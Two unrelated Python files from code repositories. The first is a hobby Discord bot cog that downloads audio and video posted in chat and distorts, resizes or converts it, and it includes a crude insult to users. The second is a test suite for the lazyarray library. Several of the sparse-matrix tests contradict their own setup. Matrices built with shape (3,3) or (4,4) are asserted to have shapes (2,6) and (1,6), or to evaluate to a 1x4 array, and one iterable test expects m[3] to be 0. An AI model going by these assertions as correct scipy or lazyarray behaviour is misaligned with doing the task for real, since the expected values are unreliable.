{
"source": "jpboxer/JPsScuffedDiscordBot",
"score": 2
}
#### File: JPsScuffedDiscordBot/cogs/AV.py
```python
import os
import discord
from discord.ext import commands
import requests
import random
import numpy as np
from pydub import AudioSegment as audi
from moviepy.editor import *
from moviepy.video.io.ffmpeg_tools import ffmpeg_extract_subclip as cutr
import time  # used for the post-playback wait in play()
import youtube_dl
audi.converter = "C:\\ffmpeg\\bin\\ffmpeg.exe"
audi.ffmpeg = "C:\\ffmpeg\\bin\\ffmpeg.exe"
audi.ffprobe ="C:\\ffmpeg\\bin\\ffprobe.exe"
if os.getcwd().find("cogs") > -1 :
os.chdir("..")
path = os.getcwd()
path+="\\tempstore"
class AV(commands.Cog):
def __init__(self, bot):
self.client = bot
@commands.Cog.listener()
async def on_ready(self):
print("AV cog loaded")
async def hwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url.lower()
if url[-3:] == "jpg" or url[-3:] == "png" :
return url
if x.content[-3:].lower() == "jpg" or x.content[-3:].lower() == "png" :
return x.content
async def ghwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url
if url[-3:] == "gif":
return url
if x.content[-3:] == "gif" :
return x.content
async def ahwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url
if url[-3:] == "mp3" or url[-3:] == "wav":
return url
if x.content[-3:] == "wav" or x.content[-3:] == "mp3":
return x.content
async def mhwnt(ctx):
chnnl = ctx.message.channel
msgs = await chnnl.history(limit=10).flatten()
url = None
for x in msgs :
if len(x.attachments) > 0 :
url = x.attachments[0].url
if url[-3:] == "mp4" or url[-3:] == "mov" or url[-4:] == "webm" :
return url
if x.content[-3:] == "mp4" or x.content[-3:] == "mov" or x.content[-4:] == "webm":
return x.content
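    # Download `url` to the local file `fln` (called as AV.dwn(...)); the whole response
    # body is held in memory, so this is only intended for small media files.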
def dwn(url, fln):
r = requests.get(url)
f = open(fln,"wb")
f.write(r.content)
        f.close()
@commands.command()
async def play(self,ctx):
os.chdir(path+"\\sounds")
url = await AV.ahwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
if form == 'mp3' :
clip = audi.from_mp3("base."+form)
else :
clip = audi.from_wav("base."+form)
query = "base."+form
        chnnl = ctx.author.voice.channel if ctx.author.voice else None
if chnnl == None :
await ctx.send("JOIN A VOICE CHAT DUMBASS")
return
if ctx.voice_client is not None :
await ctx.voice_client.move_to(chnnl)
else :
await chnnl.connect()
source = discord.PCMVolumeTransformer(discord.FFmpegPCMAudio(query))
ctx.voice_client.play(source, after=lambda e: print('Player error: %s' % e) if e else None)
        time.sleep(len(clip)/1000)  # note: blocks the event loop for the duration of the clip
await ctx.voice_client.disconnect()
@commands.command()
async def gain(self,ctx,db=6):
os.chdir(path+"\\sounds")
url = await AV.ahwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
if form == 'mp3' :
clip = audi.from_mp3("base."+form)
else :
clip = audi.from_wav("base."+form)
clip = clip.apply_gain(db)
clip.export("amp.mp3", format="mp3")
await ctx.send(file=discord.File('amp.mp3'))
@commands.command()
async def ytdown(self,ctx,url, quality="worst"):
try :
quality = quality.lower()
except :
ctx.send("thats not a word")
if quality == "best" :
ydl_opts = {
'format': 'best',
'outtmpl': 'del',
'noplaylist' : True,
}
elif quality == "worst" :
ydl_opts = {
'format': 'worst',
'outtmpl': 'del',
'noplaylist' : True,
}
else :
ydl_opts = {
'format': 'worst',
'outtmpl': 'del',
'noplaylist' : True,
}
os.chdir(path+"\\sounds")
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download([url])
files=os.listdir()
res = None
for x in files :
if x.find('del') > -1 :
res = x
try :
video = VideoFileClip(res)
video.write_videofile("base.mp4")
os.remove(res)
except :
await ctx.send("Error downloading the video")
try :
await ctx.send(file=discord.File('base.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def audiox(self,ctx):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
audio = video.audio
audio.write_audiofile("result.mp3")
try :
await ctx.send(file=discord.File('result.mp3'))
except:
await ctx.send("File to large")
@commands.command()
async def vamp(self,ctx, db=12):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video = video.volumex(db/6)
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def pvamp(self,ctx):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
subs = []
        for x in range(1, int(video.duration*10) + 1):
            pos1 = (x-1)/10
            pos2 = x/10
            if x == int(video.duration*10) :
                # last segment runs to the true end of the clip
                sub = video.subclip(t_start=pos1, t_end=video.duration)
            else :
                sub = video.subclip(t_start=pos1, t_end=pos2)
sub = sub.volumex(pos2*1.1)
subs.append(sub)
fclip = concatenate_videoclips(subs)
fclip.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def distort(self,ctx, ds=5, db=12):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video = video.volumex(db/6)
video = vfx.colorx(video, int(ds))
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def pdistort(self,ctx, ds=5):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
seg = int(leng/10)
clips = []
for x in range(1,11) :
if x == 10 :
sub = video.subclip(t_start=(x-1)*seg, t_end=leng)
else :
sub = video.subclip(t_start=(x-1)*seg, t_end=seg*x)
sub = vfx.colorx(sub,x)
clips.append(sub)
fclip = concatenate_videoclips(clips)
fclip.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def vshrink(self,ctx, ds=5):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
w,h = video.size
w = int(w/2)
h = int(h/2)
video = vfx.resize(video, (w,h))
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def spedup(self,ctx, multi=12):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video = vfx.speedx(video, multi)
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def vdownscale(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
audio = video.audio
audio.write_audiofile("temp.mp3")
clip = audi.from_mp3("temp.mp3")
clip = clip.set_frame_rate(24000)
clip.export("temp.mp3", bitrate="16k", format="mp3")
audio = AudioFileClip("temp.mp3")
video = video.set_audio(audio)
w,h = video.size
w = int(w/16)
h = int(h/16)
video = vfx.resize(video, (w,h))
#audio = audio.fx(resize, 0.125, method='bilinear')
w = int(w*16)
h = int(h*16)
video = vfx.resize(video, (w,h))
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def fhalf(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
mid = int(leng/2)
cutr("base."+form, 0, mid, targetname="res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def pvdownscale(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
audio = video.audio
audio.write_audiofile("temp.mp3")
clip = audi.from_mp3("temp.mp3")
clip = clip.set_frame_rate(24000)
flag = True
bit = 32
seg = int(video.duration/6)
aclips = []
for x in range(1,7) :
clip.export("temp.mp3", bitrate=str(bit)+'k', format="mp3")
audio = AudioFileClip("temp.mp3")
            if x == 6 :
                taudio = audio.subclip((x-1)*seg, video.duration)
else :
taudio = audio.subclip((x-1)*seg, seg*x)
bit/=2
aclips.append(taudio)
clips = []
for x in range(1,7) :
            if x == 6 :
                tvideo = video.subclip((x-1)*seg, video.duration)
else :
tvideo = video.subclip((x-1)*seg, seg*x)
            w,h = video.size  # (width, height), as in vdownscale above
h /= int(2*x)
w /= int(2*x)
tvideo = vfx.resize(tvideo, (w,h))
h *= (2*x)
w *= (2*x)
tvideo = vfx.resize(tvideo, (w,h))
tvideo = tvideo.set_audio(aclips[x-1])
clips.append(tvideo)
fclip = concatenate_videoclips(clips)
fclip.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def bhalf(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
mid = int(leng/2)
cutr("base."+form, mid, leng-1, targetname="res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
@commands.command()
async def lframe(self,ctx):
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
leng = video.duration
video.save_frame("res.png",t=leng-1,withmask=True)
try :
await ctx.send(file=discord.File('res.png'))
except:
await ctx.send("File to large")
@commands.command()
async def mp4gif(self,ctx, db=12):
os.chdir(path+"\\sounds")
url = await AV.mhwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
video.write_gif("res.gif")
try :
await ctx.send(file=discord.File('res.gif'))
except:
await ctx.send("File to large")
@commands.command()
async def gifmp4(self,ctx) :
import moviepy.video.fx.all as vfx
os.chdir(path+"\\sounds")
url = await AV.ghwnt(ctx)
form = url[-3:]
AV.dwn(url,"base."+form)
video = VideoFileClip("base."+form)
url = await AV.ahwnt(ctx)
AV.dwn(url,"base.mp3")
audio = AudioFileClip("base.mp3")
clips = []
if video.duration > audio.duration :
clips.append(video.subclip(0, audio.duration))
else :
leng=audio.duration-video.duration
clips.append(video)
while leng >= video.duration :
clips.append(video)
leng -= video.duration
clips.append(video.subclip(0,leng))
video = concatenate_videoclips(clips)
video = video.set_audio(audio)
video.write_videofile("res.mp4")
try :
await ctx.send(file=discord.File('res.mp4'))
except:
await ctx.send("File to large")
def setup(bot):
bot.add_cog(AV(bot))
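# Hedged usage sketch (assumption, not part of this file): a typical discord.py 1.x
# entry point would load this cog as an extension, e.g.
#   bot = commands.Bot(command_prefix="!")
#   bot.load_extension("cogs.AV")
#   bot.run(TOKEN)  # TOKEN is a placeholder for the bot's auth token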
```
{
"source": "JPBrain9/lazyarray",
"score": 3
}
#### File: lazyarray/test/test_lazyarray.py
```python
from lazyarray import larray, VectorizedIterable, sqrt, partial_shape
import numpy as np
from nose.tools import assert_raises, assert_equal, assert_not_equal
from nose import SkipTest
from numpy.testing import assert_array_equal, assert_array_almost_equal
import operator
from copy import deepcopy
from scipy.sparse import bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dia_matrix, dok_matrix, lil_matrix
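# MockRNG stands in for a vectorized random-number generator: next(n) returns the next
# n terms of an arithmetic sequence, so lazily evaluated values are deterministic and
# easy to compare against np.arange in the tests below.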
class MockRNG(VectorizedIterable):
def __init__(self, start, delta):
self.start = start
self.delta = delta
def next(self, n):
s = self.start
self.start += n * self.delta
return s + self.delta * np.arange(n)
# test larray
def test_create_with_int():
A = larray(3, shape=(5,))
assert A.shape == (5,)
assert A.evaluate(simplify=True) == 3
def test_create_with_int_and_dtype():
A = larray(3, shape=(5,), dtype=float)
assert A.shape == (5,)
assert A.evaluate(simplify=True) == 3
def test_create_with_float():
A = larray(3.0, shape=(5,))
assert A.shape == (5,)
assert A.evaluate(simplify=True) == 3.0
def test_create_with_list():
A = larray([1, 2, 3], shape=(3,))
assert A.shape == (3,)
assert_array_equal(A.evaluate(), np.array([1, 2, 3]))
def test_create_with_array():
A = larray(np.array([1, 2, 3]), shape=(3,))
assert A.shape == (3,)
assert_array_equal(A.evaluate(), np.array([1, 2, 3]))
def test_create_with_array_and_dtype():
A = larray(np.array([1, 2, 3]), shape=(3,), dtype=int)
assert A.shape == (3,)
assert_array_equal(A.evaluate(), np.array([1, 2, 3]))
def test_create_with_generator():
def plusone():
i = 0
while True:
yield i
i += 1
A = larray(plusone(), shape=(5, 11))
assert_array_equal(A.evaluate(),
np.arange(55).reshape((5, 11)))
def test_create_with_function1D():
A = larray(lambda i: 99 - i, shape=(3,))
assert_array_equal(A.evaluate(),
np.array([99, 98, 97]))
def test_create_with_function1D_and_dtype():
A = larray(lambda i: 99 - i, shape=(3,), dtype=float)
assert_array_equal(A.evaluate(),
np.array([99.0, 98.0, 97.0]))
def test_create_with_function2D():
A = larray(lambda i, j: 3 * j - 2 * i, shape=(2, 3))
assert_array_equal(A.evaluate(),
np.array([[0, 3, 6],
[-2, 1, 4]]))
def test_create_inconsistent():
assert_raises(ValueError, larray, [1, 2, 3], shape=4)
def test_create_with_string():
assert_raises(TypeError, larray, "123", shape=3)
def test_create_with_larray():
A = 3 + larray(lambda i: 99 - i, shape=(3,))
B = larray(A, shape=(3,), dtype=int)
assert_array_equal(B.evaluate(),
np.array([102, 101, 100]))
## For sparse matrices
# The sparse fixtures are defined at module level so that the evaluate / operation /
# getitem tests further down can refer to them directly.
row = np.array([0, 2, 2, 0, 1, 2])
col = np.array([0, 0, 1, 2, 2, 2])
data = np.array([1, 2, 3, 4, 5, 6])
bsr = larray(bsr_matrix((data, (row, col)), shape=(3, 3)))  # For bsr_matrix
coo = larray(coo_matrix((data, (row, col)), shape=(3, 3)))  # For coo_matrix
csc = larray(csc_matrix((data, (row, col)), shape=(3, 3)))  # For csc_matrix
csr = larray(csr_matrix((data, (row, col)), shape=(3, 3)))  # For csr_matrix
data_dia = np.array([[1, 2, 3, 4]]).repeat(3, axis=0)  # For dia_matrix
offsets_dia = np.array([0, -1, 2])  # For dia_matrix
dia = larray(dia_matrix((data_dia, offsets_dia), shape=(4, 4)))  # For dia_matrix
dok = larray(dok_matrix(((row, col)), shape=(3, 3)))  # For dok_matrix
lil = larray(lil_matrix(data, shape=(3, 3)))  # For lil_matrix
def test_create_with_sparse_array():
    assert bsr.shape == (3, 3)
    assert coo.shape == (3, 3)
    assert csc.shape == (3, 3)
    assert csr.shape == (3, 3)
    assert dia.shape == (4, 4)
    assert dok.shape == (2, 6)
    assert lil.shape == (1, 6)
def test_evaluate_with_sparse_array():
assert_array_equal(bsr.evaluate(), bsr_matrix((data, (row, col))).toarray()) # For bsr_matrix
assert_array_equal(coo.evaluate(), coo_matrix((data, (row, col))).toarray()) # For coo_matrix
assert_array_equal(csc.evaluate(), csc_matrix((data, (row, col))).toarray()) # For csc_matrix
assert_array_equal(csr.evaluate(), csr_matrix((data, (row, col))).toarray()) # For csr_matrix
    assert_array_equal(dia.evaluate(), dia_matrix((data_dia, offsets_dia), shape=(4, 4)).toarray())  # For dia_matrix
    assert_array_equal(dok.evaluate(), dok_matrix(((row, col)), shape=(3, 3)).toarray())  # For dok_matrix
    assert_array_equal(lil.evaluate(), lil_matrix(data, shape=(3, 3)).toarray())  # For lil_matrix
def test_multiple_operations_with_sparse_array():
# For bsr_matrix
bsr0 = bsr /100.0
bsr1 = 0.2 + bsr0
assert_array_almost_equal(bsr0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
    assert_array_almost_equal(bsr1.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For coo_matrix
coo0 = coo /100.0
coo1 = 0.2 + coo0
assert_array_almost_equal(coo0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
    assert_array_almost_equal(coo1.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For csc_matrix
csc0 = csc /100.0
csc1 = 0.2 + csc0
assert_array_almost_equal(csc0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
    assert_array_almost_equal(csc1.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For csr_matrix
csr0 = csr /100.0
csr1 = 0.2 + csr0
    assert_array_almost_equal(csr0.evaluate(), np.array([[0.01, 0., 0.04], [0., 0., 0.05], [0.02, 0.03, 0.06]]))
    assert_array_almost_equal(csr1.evaluate(), np.array([[0.21, 0.2, 0.24], [0.2, 0.2, 0.25], [0.22, 0.23, 0.26]]))
# For dia_matrix
dia0 = dia /100.0
dia1 = 0.2 + dia0
assert_array_almost_equal(dia0.evaluate(), np.array([[0.01, 0.02, 0.03, 0.04]]))
assert_array_almost_equal(dia1.evaluate(), np.array([[0.21, 0.22, 0.23, 0.24]]))
# For dok_matrix
dok0 = dok /100.0
dok1 = 0.2 + dok0
assert_array_almost_equal(dok0.evaluate(), np.array([[0., 0.02, 0.02, 0., 0.01, 0.02], [0., 0., 0.01, 0.02, 0.02, 0.02]]))
assert_array_almost_equal(dok1.evaluate(), np.array([[0.2, 0.22, 0.22, 0.2, 0.21, 0.22], [0.2, 0.2, 0.21, 0.22, 0.22, 0.22]]))
# For lil_matrix
lil0 = lil /100.0
lil1 = 0.2 + lil0
assert_array_almost_equal(lil0.evaluate(), np.array([[0.01, 0.02, 0.03, 0.04, 0.05, 0.06]]))
assert_array_almost_equal(lil1.evaluate(), np.array([[0.21, 0.22, 0.23, 0.24, 0.25, 0.26]]))
def test_getitem_from_2D_sparse_array():
assert_raises(IndexError, bsr.__getitem__, (3, 0))
assert_raises(IndexError, coo.__getitem__, (3, 0))
assert_raises(IndexError, csc.__getitem__, (3, 0))
assert_raises(IndexError, csr.__getitem__, (3, 0))
assert_raises(IndexError, dia.__getitem__, (3, 0))
assert_raises(IndexError, dok.__getitem__, (3, 0))
assert_raises(IndexError, lil.__getitem__, (3, 0))
# def test_columnwise_iteration_with_flat_array():
# m = larray(5, shape=(4,3)) # 4 rows, 3 columns
# cols = [col for col in m.by_column()]
# assert_equal(cols, [5, 5, 5])
#
# def test_columnwise_iteration_with_structured_array():
# input = np.arange(12).reshape((4,3))
# m = larray(input, shape=(4,3)) # 4 rows, 3 columns
# cols = [col for col in m.by_column()]
# assert_array_equal(cols[0], input[:,0])
# assert_array_equal(cols[2], input[:,2])
#
# def test_columnwise_iteration_with_function():
# input = lambda i,j: 2*i + j
# m = larray(input, shape=(4,3))
# cols = [col for col in m.by_column()]
# assert_array_equal(cols[0], np.array([0, 2, 4, 6]))
# assert_array_equal(cols[1], np.array([1, 3, 5, 7]))
# assert_array_equal(cols[2], np.array([2, 4, 6, 8]))
#
# def test_columnwise_iteration_with_flat_array_and_mask():
# m = larray(5, shape=(4,3)) # 4 rows, 3 columns
# mask = np.array([True, False, True])
# cols = [col for col in m.by_column(mask=mask)]
# assert_equal(cols, [5, 5])
#
# def test_columnwise_iteration_with_structured_array_and_mask():
# input = np.arange(12).reshape((4,3))
# m = larray(input, shape=(4,3)) # 4 rows, 3 columns
# mask = np.array([False, True, True])
# cols = [col for col in m.by_column(mask=mask)]
# assert_array_equal(cols[0], input[:,1])
# assert_array_equal(cols[1], input[:,2])
def test_size_related_properties():
m1 = larray(1, shape=(9, 7))
m2 = larray(1, shape=(13,))
m3 = larray(1)
assert_equal(m1.nrows, 9)
assert_equal(m1.ncols, 7)
assert_equal(m1.size, 63)
assert_equal(m2.nrows, 13)
assert_equal(m2.ncols, 1)
assert_equal(m2.size, 13)
assert_raises(ValueError, lambda: m3.nrows)
assert_raises(ValueError, lambda: m3.ncols)
assert_raises(ValueError, lambda: m3.size)
def test_evaluate_with_flat_array():
m = larray(5, shape=(4, 3))
assert_array_equal(m.evaluate(), 5 * np.ones((4, 3)))
def test_evaluate_with_structured_array():
input = np.arange(12).reshape((4, 3))
m = larray(input, shape=(4, 3))
assert_array_equal(m.evaluate(), input)
def test_evaluate_with_functional_array():
input = lambda i, j: 2 * i + j
m = larray(input, shape=(4, 3))
assert_array_equal(m.evaluate(),
np.array([[0, 1, 2],
[2, 3, 4],
[4, 5, 6],
[6, 7, 8]]))
def test_evaluate_with_vectorized_iterable():
input = MockRNG(0, 1)
m = larray(input, shape=(7, 3))
assert_array_equal(m.evaluate(),
np.arange(21).reshape((7, 3)))
def test_evaluate_twice_with_vectorized_iterable():
input = MockRNG(0, 1)
m1 = larray(input, shape=(7, 3)) + 3
m2 = larray(input, shape=(7, 3)) + 17
assert_array_equal(m1.evaluate(),
np.arange(3, 24).reshape((7, 3)))
assert_array_equal(m2.evaluate(),
np.arange(38, 59).reshape((7, 3)))
def test_evaluate_structured_array_size_1_simplify():
m = larray([5.0], shape=(1,))
assert_equal(m.evaluate(simplify=True), 5.0)
n = larray([2.0], shape=(1,))
assert_equal((m/n).evaluate(simplify=True), 2.5)
def test_iadd_with_flat_array():
m = larray(5, shape=(4, 3))
m += 2
assert_array_equal(m.evaluate(), 7 * np.ones((4, 3)))
assert_equal(m.base_value, 5)
assert_equal(m.evaluate(simplify=True), 7)
def test_add_with_flat_array():
m0 = larray(5, shape=(4, 3))
m1 = m0 + 2
assert_equal(m1.evaluate(simplify=True), 7)
assert_equal(m0.evaluate(simplify=True), 5)
def test_lt_with_flat_array():
m0 = larray(5, shape=(4, 3))
m1 = m0 < 10
assert_equal(m1.evaluate(simplify=True), True)
assert_equal(m0.evaluate(simplify=True), 5)
def test_lt_with_structured_array():
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
m1 = m0 < 5
assert_array_equal(m1.evaluate(simplify=True), input < 5)
def test_structured_array_lt_array():
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
comparison = 5 * np.ones((4, 3))
m1 = m0 < comparison
assert_array_equal(m1.evaluate(simplify=True), input < comparison)
def test_rsub_with_structured_array():
m = larray(np.arange(12).reshape((4, 3)))
assert_array_equal((11 - m).evaluate(),
np.arange(11, -1, -1).reshape((4, 3)))
def test_inplace_mul_with_structured_array():
m = larray((3 * x for x in range(4)), shape=(4,))
m *= 7
assert_array_equal(m.evaluate(),
np.arange(0, 84, 21))
def test_abs_with_structured_array():
m = larray(lambda i, j: i - j, shape=(3, 4))
assert_array_equal(abs(m).evaluate(),
np.array([[0, 1, 2, 3],
[1, 0, 1, 2],
[2, 1, 0, 1]]))
def test_multiple_operations_with_structured_array():
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
m1 = (m0 + 2) < 5
m2 = (m0 < 5) + 2
assert_array_equal(m1.evaluate(simplify=True), (input + 2) < 5)
assert_array_equal(m2.evaluate(simplify=True), (input < 5) + 2)
assert_array_equal(m0.evaluate(simplify=True), input)
def test_multiple_operations_with_functional_array():
m = larray(lambda i: i, shape=(5,))
m0 = m / 100.0
m1 = 0.2 + m0
assert_array_almost_equal(m0.evaluate(), np.array([0.0, 0.01, 0.02, 0.03, 0.04]), decimal=12)
assert_array_almost_equal(m1.evaluate(), np.array([0.20, 0.21, 0.22, 0.23, 0.24]), decimal=12)
assert_equal(m1[0], 0.2)
def test_operations_combining_constant_and_structured_arrays():
m0 = larray(10, shape=(5,))
m1 = larray(np.arange(5))
m2 = m0 + m1
assert_array_almost_equal(m2.evaluate(), np.arange(10, 15))
def test_apply_function_to_constant_array():
f = lambda m: 2 * m + 3
m0 = larray(5, shape=(4, 3))
m1 = f(m0)
assert isinstance(m1, larray)
assert_equal(m1.evaluate(simplify=True), 13)
# the following tests the internals, not the behaviour
# it is just to check I understand what's going on
assert_equal(m1.operations, [(operator.mul, 2), (operator.add, 3)])
def test_apply_function_to_structured_array():
f = lambda m: 2 * m + 3
input = np.arange(12).reshape((4, 3))
m0 = larray(input, shape=(4, 3))
m1 = f(m0)
assert isinstance(m1, larray)
assert_array_equal(m1.evaluate(simplify=True), input * 2 + 3)
def test_apply_function_to_functional_array():
input = lambda i, j: 2 * i + j
m0 = larray(input, shape=(4, 3))
f = lambda m: 2 * m + 3
m1 = f(m0)
assert_array_equal(m1.evaluate(),
np.array([[3, 5, 7],
[7, 9, 11],
[11, 13, 15],
[15, 17, 19]]))
def test_add_two_constant_arrays():
m0 = larray(5, shape=(4, 3))
m1 = larray(7, shape=(4, 3))
m2 = m0 + m1
assert_equal(m2.evaluate(simplify=True), 12)
# the following tests the internals, not the behaviour
# it is just to check I understand what's going on
assert_equal(m2.base_value, m0.base_value)
assert_equal(m2.operations, [(operator.add, m1)])
def test_add_incommensurate_arrays():
m0 = larray(5, shape=(4, 3))
m1 = larray(7, shape=(5, 3))
assert_raises(ValueError, m0.__add__, m1)
def test_getitem_from_2D_constant_array():
m = larray(3, shape=(4, 3))
assert m[0, 0] == m[3, 2] == m[-1, 2] == m[-4, 2] == m[2, -3] == 3
assert_raises(IndexError, m.__getitem__, (4, 0))
assert_raises(IndexError, m.__getitem__, (2, -4))
def test_getitem_from_1D_constant_array():
m = larray(3, shape=(43,))
assert m[0] == m[42] == 3
def test_getitem__with_slice_from_constant_array():
m = larray(3, shape=(4, 3))
assert_array_equal(m[:3, 0],
np.array([3, 3, 3]))
def test_getitem__with_thinslice_from_constant_array():
m = larray(3, shape=(4, 3))
assert_equal(m[2:3, 0:1], 3)
def test_getitem__with_mask_from_constant_array():
m = larray(3, shape=(4, 3))
assert_array_equal(m[1, (0, 2)],
np.array([3, 3]))
def test_getitem_with_numpy_integers_from_2D_constant_array():
if not hasattr(np, "int64"):
raise SkipTest("test requires a 64-bit system")
m = larray(3, shape=(4, 3))
assert m[np.int64(0), np.int32(0)] == 3
def test_getslice_from_constant_array():
m = larray(3, shape=(4, 3))
assert_array_equal(m[:2],
np.array([[3, 3, 3],
[3, 3, 3]]))
def test_getslice_past_bounds_from_constant_array():
m = larray(3, shape=(5,))
assert_array_equal(m[2:10],
np.array([3, 3, 3]))
def test_getitem_from_structured_array():
m = larray(3 * np.ones((4, 3)), shape=(4, 3))
assert m[0, 0] == m[3, 2] == m[-1, 2] == m[-4, 2] == m[2, -3] == 3
assert_raises(IndexError, m.__getitem__, (4, 0))
assert_raises(IndexError, m.__getitem__, (2, -4))
def test_getitem_from_2D_functional_array():
m = larray(lambda i, j: 2 * i + j, shape=(6, 5))
assert_equal(m[5, 4], 14)
def test_getitem_from_1D_functional_array():
m = larray(lambda i: i ** 3, shape=(6,))
assert_equal(m[5], 125)
def test_getitem_from_3D_functional_array():
m = larray(lambda i, j, k: i + j + k, shape=(2, 3, 4))
assert_raises(NotImplementedError, m.__getitem__, (0, 1, 2))
def test_getitem_from_vectorized_iterable():
input = MockRNG(0, 1)
m = larray(input, shape=(7,))
m3 = m[3]
assert isinstance(m3, (int, np.integer))
assert_equal(m3, 0)
assert_equal(m[0], 1)
def test_getitem_with_slice_from_2D_functional_array():
m = larray(lambda i, j: 2 * i + j, shape=(6, 5))
assert_array_equal(m[2:5, 3:],
np.array([[7, 8],
[9, 10],
[11, 12]]))
def test_getitem_with_slice_from_2D_functional_array_2():
def test_function(i, j):
return i * i + 2 * i * j + 3
m = larray(test_function, shape=(3, 15))
assert_array_equal(m[:, 3:14:3],
np.fromfunction(test_function, shape=(3, 15))[:, 3:14:3])
def test_getitem_with_mask_from_2D_functional_array():
a = np.arange(30).reshape((6, 5))
m = larray(lambda i, j: 5 * i + j, shape=(6, 5))
assert_array_equal(a[[2, 3], [3, 4]],
np.array([13, 19]))
assert_array_equal(m[[2, 3], [3, 4]],
np.array([13, 19]))
def test_getitem_with_mask_from_1D_functional_array():
m = larray(lambda i: np.sqrt(i), shape=(10,))
assert_array_equal(m[[0, 1, 4, 9]],
np.array([0, 1, 2, 3]))
def test_getitem_with_boolean_mask_from_1D_functional_array():
m = larray(lambda i: np.sqrt(i), shape=(10,))
assert_array_equal(m[np.array([1, 1, 0, 0, 1, 0, 0, 0, 0, 1], dtype=bool)],
np.array([0, 1, 2, 3]))
def test_getslice_from_2D_functional_array():
m = larray(lambda i, j: 2 * i + j, shape=(6, 5))
assert_array_equal(m[1:3],
np.array([[2, 3, 4, 5, 6],
[4, 5, 6, 7, 8]]))
def test_getitem_from_iterator_array():
m = larray(iter([1, 2, 3]), shape=(3,))
assert_raises(NotImplementedError, m.__getitem__, 2)
def test_getitem_from_array_with_operations():
a1 = np.array([[1, 3, 5], [7, 9, 11]])
m1 = larray(a1)
f = lambda i, j: np.sqrt(i * i + j * j)
a2 = np.fromfunction(f, shape=(2, 3))
